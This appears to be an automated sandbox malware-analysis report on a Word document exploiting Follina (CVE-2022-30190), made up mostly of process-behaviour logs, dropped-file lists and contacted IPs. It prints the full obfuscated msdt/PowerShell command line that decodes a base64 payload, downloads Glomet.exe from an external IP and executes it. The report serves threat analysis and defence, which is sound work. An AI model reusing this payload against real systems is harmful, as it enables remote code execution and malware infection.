Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\splwow64.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Glomet.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Glomet.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\ProgramData\Glomet.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Found dropped PE file which has not been started or loaded
Source: C:\ProgramData\Glomet.exe Dropped PE file which has not been started: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\GENOPBYGGEDE\Intraretinal\Tilstningsfries\api-ms-win-crt-stdio-l1-1-0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ea13q231\ea13q231.dll Jump to dropped file
Source: C:\ProgramData\Glomet.exe Dropped PE file which has not been started: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\REDO\DYSMENORRHEIC\Tidehead7\Kartonens\MsMpRes.dll Jump to dropped file
Source: C:\ProgramData\Glomet.exe Dropped PE file which has not been started: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Fns\differentieringerne\PHOTOCOMPOSE\serpigoes\api-ms-win-core-timezone-l1-1-0.dll Jump to dropped file
Source: C:\ProgramData\Glomet.exe Dropped PE file which has not been started: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Redbones\libmpdec-2.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\llhoph4d\llhoph4d.dll Jump to dropped file
Source: C:\ProgramData\Glomet.exe Dropped PE file which has not been started: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Strawberries\MOLAKKORD\SetEHCIKey.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\q0vyiohn\q0vyiohn.dll Jump to dropped file
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\msdt.exe Window / User API: threadDelayed 1567 Jump to behavior
Source: C:\ProgramData\Glomet.exe Code function: 29_2_00405A19 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 29_2_00405A19
Source: C:\ProgramData\Glomet.exe Code function: 29_2_004065CE FindFirstFileA,FindClose, 29_2_004065CE
Source: C:\ProgramData\Glomet.exe Code function: 29_2_004027AA FindFirstFileA, 29_2_004027AA
Source: C:\Windows\splwow64.exe Thread delayed: delay time: 120000 Jump to behavior
Source: C:\ProgramData\Glomet.exe API call chain: ExitProcess graph end node
Source: C:\ProgramData\Glomet.exe API call chain: ExitProcess graph end node
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4IChuZXctb2JqZWN0IHN5c3RlbS5uZXQud2ViY2xpZW50KS5kb3dubG9hZGZpbGUoImh0dHA6Ly80NS4xNDEuMjM3LjE4L0dsb21ldC5leGUiLCJjOlxwcm9ncmFtZGF0YVxHbG9tZXQuZXhlIik7U3RhcnQtUHJvY2VzcyAiYzpccHJvZ3JhbWRhdGFcR2xvbWV0LmV4ZSI='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aWV4IChuZXctb2JqZWN0IHN5c3RlbS5uZXQud2ViY2xpZW50KS5kb3dubG9hZGZpbGUoImh0dHA6Ly80NS4xNDEuMjM3LjE4L0dsb21ldC5leGUiLCJjOlxwcm9ncmFtZGF0YVxHbG9tZXQuZXhlIik7U3RhcnQtUHJvY2VzcyAiYzpccHJvZ3JhbWRhdGFcR2xvbWV0LmV4ZSI='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES216A.tmp" "c:\Users\user\AppData\Local\Temp\q0vyiohn\CSC14339BC3D3E94BA0AEA5453DEFD3E9E.TMP" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3EE5.tmp" "c:\Users\user\AppData\Local\Temp\ea13q231\CSCF24C6B632D84EA4B9FDE29780CB1444.TMP" Jump to behavior
Source: C:\ProgramData\Glomet.exe Process created: C:\Windows\SysWOW64\cmd.exe CMD.EXE /C SET /A "0x00^75" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDEDE.tmp" "c:\Users\user\AppData\Local\Temp\llhoph4d\CSCA6DEB1F21B847AF87589FE9AEBF81D1.TMP" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\ProgramData\Glomet.exe Code function: 29_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 29_2_004033B3
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 665041 Sample: 20220714 DWG.doc Startdate: 15/07/2022 Architecture: WINDOWS Score: 72 59 Multi AV Scanner detection for submitted file 2->59 61 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->61 63 Yara detected Microsoft Office Exploit Follina CVE-2022-30190 2->63 65 Document exploit detected (process start blacklist hit) 2->65 7 Glomet.exe 4 57 2->7         started        11 WINWORD.EXE 67 67 2->11         started        14 csc.exe 3 2->14         started        16 2 other processes 2->16 process3 dnsIp4 39 C:\Users\user\Pictures\...\SetEHCIKey.exe, PE32 7->39 dropped 41 C:\Users\user\Pictures\...\libmpdec-2.dll, PE32+ 7->41 dropped 43 C:\Users\user\Pictures\...\MsMpRes.dll, PE32+ 7->43 dropped 53 3 other files (none is malicious) 7->53 dropped 67 Obfuscated command line found 7->67 18 cmd.exe 1 7->18         started        55 45.141.237.18, 49743, 49744, 49766 SPECTRAIPSpectraIPBVNL Netherlands 11->55 57 192.168.2.1 unknown unknown 11->57 45 C:\Users\user\...\20220714 DWG.doc.LNK, MS 11->45 dropped 20 msdt.exe 21 11->20         started        23 splwow64.exe 11->23         started        25 MSOSYNC.EXE 5 12 11->25         started        47 C:\Users\user\AppData\Local\...\llhoph4d.dll, PE32 14->47 dropped 27 cvtres.exe 1 14->27         started        49 C:\Users\user\AppData\Local\...\q0vyiohn.dll, PE32 16->49 dropped 51 C:\Users\user\AppData\Local\...\ea13q231.dll, PE32 16->51 dropped 29 cvtres.exe 1 16->29         started        31 cvtres.exe 1 16->31         started        file5 signatures6 process7 file8 33 conhost.exe 18->33         started        35 C:\Windows\Temp\...\DiagPackage.dll.mui, PE32 20->35 dropped 37 C:\Windows\Temp\...\DiagPackage.dll, PE32+ 20->37 dropped process9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.141.237.18
 unknown Netherlands
62068 SPECTRAIPSpectraIPBVNL false

Private

IP
192.168.2.1

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://45.141.237.18/icons/ubuntu-logo.png false
  • Avira URL Cloud: safe
 unknown
http://45.141.237.18/Glomet.html false
  • Avira URL Cloud: safe
 unknown